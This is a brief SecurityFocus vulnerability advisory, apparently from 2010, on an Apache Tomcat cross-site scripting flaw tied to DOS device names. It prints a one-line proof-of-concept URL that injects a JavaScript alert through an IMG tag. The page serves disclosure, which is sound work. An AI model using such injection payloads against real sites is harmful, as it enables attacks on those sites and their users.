Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability

The following proof of concept ws provided by Matt Moore <matt@westpoint.ltd.uk>:
tomcat-server/COM2.IMG%20src= "Javascript:alert(document.domain)"


 

Privacy Statement
Copyright 2010, SecurityFocus